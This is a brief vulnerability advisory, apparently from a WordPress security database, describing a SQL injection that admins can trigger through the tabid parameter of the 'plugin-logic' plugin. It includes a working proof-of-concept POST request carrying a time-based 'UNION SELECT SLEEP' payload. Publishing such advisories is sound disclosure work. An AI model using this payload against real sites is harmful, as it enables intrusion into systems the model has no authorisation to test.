The plugin does not sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users such as admin
POST /wp-admin/network/plugins.php?page=plugin-logic&tabid;=options%20union%20SELECT%20SLEEP(16)%3b%23 HTTP/1.1 Content-Type: application/x-www-form-urlencoded Content-Length: 123 Cookie: [admin+] plulo_checklist%5B0%5D=0&plulo;_checklist%5B0%5D=1&plulo;_radiolist%5B0%5D=0&plulo;_txt_list%5B0%5D=&plulo;_submit=Save+Changes